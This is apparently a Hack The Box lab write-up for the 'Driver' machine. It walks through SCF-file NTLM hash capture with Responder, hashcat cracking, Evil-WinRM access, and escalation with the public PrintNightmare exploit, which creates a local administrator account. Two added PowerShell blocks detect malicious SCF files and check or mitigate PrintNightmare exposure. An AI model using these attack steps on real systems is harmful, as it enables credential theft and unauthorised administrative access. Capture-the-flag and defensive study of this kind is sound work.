Driver is an easy box from Hack The Box, demonstrating the impact of the Windows PrintNightmare vulnerability; I also learnt about SCF files, which were a new attack vector for me.


I deployed the machine and, once given the target IP, started an Nmap scan to check the available ports.

└──╼ $sudo nmap -sC -sV -oA nmap/initial
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:20 GMT
Nmap scan report for
Host is up (0.020s latency).
Not shown: 997 filtered ports
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-28T00:20:49
|_  start_date: 2022-02-27T04:55:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.89 seconds

Three ports open:

  • 80 - HTTP - Microsoft IIS httpd 10.0
  • 135 - MSRPC - Microsoft Windows RPC
  • 445 - SMB - Microsoft Windows 7 - 10 microsoft-ds

I also ran a full port scan and found WinRM to be open on port 5985.

└──╼ $sudo nmap -p- -oA nmap/all_ports
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:25 GMT
Nmap scan report for
Host is up (0.026s latency).
Not shown: 65531 filtered ports
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman

The web service returns an unauthorized response; however, it could be leaking a username with the message “Please enter password for admin”.


Before looking at the web service I tried enumerating SMB with various tools such as smbmap, smbclient and CrackMapExec; however, I had no joy.

└──╼ $cme smb
SMB    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
└──╼ $smbmap -H
[!] Authentication error on

So I turned my attention to the web service. Navigating to the IP I did get a login prompt. I tried admin:admin and got in!


Once logged in, I got a simple web page with an email address of ‘support@driver.htb’. I updated my hosts file with ‘driver.htb’ just in case I needed it later.


The only link that works on the web page is ‘Firmware Updates’. This page provides an upload function. I played around with this for such a long time, trying attacks like XSS and uploading PHP shells, but nothing worked.


However re-reading the line:

Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

I decided to change my Google search to “http smb file share exploit” and found an article on using SCF files.

Initial Access

The first article that came back was from Penetration Testing Lab: https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/. After reading the article I created the file test.scf using the example they provide and changed the IP to my VPN IP.

└──╼ $cat test.scf 

I started responder with the command ‘sudo responder -I tun0’.

I then uploaded the file using the web upload function and got a hit from Responder:

[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:87ea6d299d14fa32:ED6355EFB0444E974805B3FF0E0B9B26:0101000000000000803021AB042CD801AE67B0D5B0D050060000000002000800350054003400480001001E00570049004E002D0

I put the hash into a file called ‘hash’ and used hashcat to crack it with the command hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt.
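The SCF trick works because Explorer resolves the file's IconFile entry over SMB the moment anyone browses the share, sending that user's NTLMv2 response to whatever host the entry names. From the defender's side the uploads share is therefore worth sweeping for exactly that pattern. The following PowerShell is an added example, not code from the write-up or from the linked article; the share path and quarantine directory are assumptions, and the Get-RemoteIconFile function name is mine.

```powershell
# Added example: find SCF files on an upload share whose IconFile points at a
# UNC path and move them out of the share. Paths below are assumed, not taken
# from the write-up.
[CmdletBinding(SupportsShouldProcess)]
param(
    [string]$SharePath     = '\\DRIVER\FirmwareUploads',   # assumed share path
    [string]$QuarantineDir = 'C:\Quarantine\scf'           # assumed evidence folder
)

function Get-RemoteIconFile {
    # SCF files are INI-style text. Returns the IconFile target when it is a
    # UNC path (\\host\share\...), otherwise $null. -match is case-insensitive.
    param([Parameter(Mandatory)][string]$Path)
    foreach ($line in Get-Content -LiteralPath $Path -ErrorAction Stop) {
        if ($line -match '^\s*IconFile\s*=\s*(\\\\[^\\]+\\.+?)\s*$') {
            return $Matches[1]
        }
    }
    return $null
}

$findings = Get-ChildItem -LiteralPath $SharePath -Recurse -File -Filter *.scf |
    ForEach-Object {
        $target = Get-RemoteIconFile -Path $_.FullName
        if ($target) {
            [pscustomobject]@{
                File     = $_.FullName
                IconFile = $target
                # The host every browsing user will authenticate to.
                Host     = ($target -replace '^\\\\([^\\]+)\\.*$', '$1')
                Uploaded = $_.CreationTime
            }
        }
    }

if (-not $findings) {
    Write-Output "No SCF files with remote IconFile targets under $SharePath"
    return
}

$findings | Format-Table -AutoSize

# Quarantine rather than delete so the file survives as evidence for the IR team.
New-Item -ItemType Directory -Path $QuarantineDir -Force | Out-Null
foreach ($f in $findings) {
    if ($PSCmdlet.ShouldProcess($f.File, "Move to $QuarantineDir")) {
        Move-Item -LiteralPath $f.File -Destination $QuarantineDir -Force
    }
}
```

Run it with -WhatIf first to see what would be moved. Sweeping after the fact is the weakest control, though: the upload handler should refuse .scf uploads outright, and clients should not be able to reach port 445 on arbitrary hosts, which is what turns a stray file into a credential leak. The earlier Nmap output also showed SMB signing disabled on the target, which is a separate finding from the same scan.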

Now that I had a username and password, I was able to log in over WinRM using Evil-WinRM.

└──╼ $/opt/evil-winrm/evil-winrm.rb -u tony -i
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> 

Priv Esc

Now that I had a foothold, I did some basic enumeration of the box. Looking at the running services I could see the Windows print spooler service.

    381      23     5164      14448 ...12            1128 spoolsv

This made me think of the PrintNightmare exploit. I could also have used rpcdump to find this.

└──╼ $rpcdump.py | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol 

To exploit this, I used the exploit created by Caleb Stewart and John Hammond.

I used git to clone the repo into my /opt directory.

└──╼ $sudo git clone https://github.com/calebstewart/CVE-2021-1675.git
Cloning into 'CVE-2021-1675'...
remote: Enumerating objects: 40, done.
remote: Counting objects: 100% (40/40), done.
remote: Compressing objects: 100% (32/32), done.
remote: Total 40 (delta 9), reused 37 (delta 6), pack-reused 0
Receiving objects: 100% (40/40), 131.12 KiB | 932.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.
└──╼ $cd CVE-2021-1675
└──╼ $ls
CVE-2021-1675.ps1  nightmare-dll  README.md

Now, using Evil-WinRM, I can upload the PowerShell script and execute it.

*Evil-WinRM* PS C:\Users\tony\Documents> upload /opt/CVE-2021-1675/CVE-2021-1675.ps1
Info: Uploading /opt/CVE-2021-1675/CVE-2021-1675.ps1 to C:\Users\tony\Documents\CVE-2021-1675.ps1

Data: 238080 bytes of 238080 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\tony\Documents> Import-Module C:\Users\tony\Documents\CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
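The exploit output above shows the two things an administrator can act on: the spooler was running, and a low-privileged user was allowed to install a printer driver, which is what let the script add a local administrator. The PowerShell below is an added example, not code from the write-up or the CVE-2021-1675 repository; it reports whether a host is exposed in that way and, with -Remediate, applies the Microsoft-documented Point and Print policy values. The function names are mine; the registry key, value names and the PrintService event IDs 316 and 808 are Microsoft's, and the 24-hour lookback is an arbitrary default.

```powershell
# Added example: assess and optionally mitigate PrintNightmare exposure
# (CVE-2021-1675 / CVE-2021-34527). Run from an elevated session.
[CmdletBinding(SupportsShouldProcess)]
param([switch]$Remediate)

$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Get-PointAndPrintValue {
    # Returns the DWORD stored under the Point and Print policy key, or 'not set'.
    param([Parameter(Mandatory)][string]$Name)
    $item = Get-ItemProperty -Path $PolicyKey -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $item) { $item.$Name } else { 'not set' }
}

function Get-PrintNightmareExposure {
    $spooler  = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $restrict = Get-PointAndPrintValue 'RestrictDriverInstallationToAdministrators'
    $noWarn   = Get-PointAndPrintValue 'NoWarningNoElevationOnInstall'
    $prompt   = Get-PointAndPrintValue 'UpdatePromptSettings'

    # Exposed when the spooler runs and any policy value re-opens driver installs
    # to non-admins. A host missing the July/August 2021 updates is exposed no
    # matter what these say (Driver reports build 10240, which predates them);
    # patch level is deliberately not checked here.
    $running = [bool]($spooler -and $spooler.Status -eq 'Running')
    $weak    = ($restrict -is [int] -and $restrict -eq 0) -or
               ($noWarn   -is [int] -and $noWarn   -eq 1) -or
               ($prompt   -is [int] -and $prompt   -ne 0)

    [pscustomobject]@{
        SpoolerRunning                             = $running
        SpoolerStartType                           = if ($spooler) { $spooler.StartType } else { 'not installed' }
        RestrictDriverInstallationToAdministrators = $restrict
        NoWarningNoElevationOnInstall              = $noWarn
        UpdatePromptSettings                       = $prompt
        Exposed                                    = [bool]($running -and $weak)
    }
}

function Get-RecentDriverInstallEvents {
    # Event 316 (driver added or updated) and 808 (plug-in module failed to load)
    # in the PrintService Operational log are the usual traces of an attempt.
    # That log is disabled by default, so enable it before relying on this.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PrintService/Operational'
        Id        = 316, 808
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, Message
}

$state = Get-PrintNightmareExposure
$state | Format-List
Get-RecentDriverInstallEvents | Format-Table -AutoSize -Wrap

if ($Remediate -and $state.Exposed) {
    # Disabling the spooler is the complete fix but only viable where nothing prints.
    if ($PSCmdlet.ShouldProcess('Spooler', 'Stop and disable the service')) {
        Stop-Service -Name Spooler -Force
        Set-Service  -Name Spooler -StartupType Disabled
    }
    if ($PSCmdlet.ShouldProcess($PolicyKey, 'Restrict driver installation to administrators')) {
        New-Item -Path $PolicyKey -Force | Out-Null
        Set-ItemProperty -Path $PolicyKey -Name RestrictDriverInstallationToAdministrators -Value 1 -Type DWord
        Set-ItemProperty -Path $PolicyKey -Name NoWarningNoElevationOnInstall             -Value 0 -Type DWord
        Set-ItemProperty -Path $PolicyKey -Name UpdatePromptSettings                      -Value 0 -Type DWord
    }
}
```

On a patched host the policy values matter only if someone has loosened them; on an unpatched host like Driver the only real fixes are the update or stopping the spooler, and the script's -WhatIf output shows which of the two actions it would take. After an incident, the local Administrators group should also be reviewed for accounts that were not created by the organisation, since that is the end result the exploit output above records.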

It worked! I canceled my current WinRM session and logged back in using the new credentials.

*Evil-WinRM* PS C:\Users\tony\Documents> exit

Info: Exiting with code 0

└──╼ $/opt/evil-winrm/evil-winrm.rb -u adm1n -i
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\adm1n\Documents> cd C:/Users/Administrator/Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/26/2022   8:56 PM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

That's the box, thanks for reading!


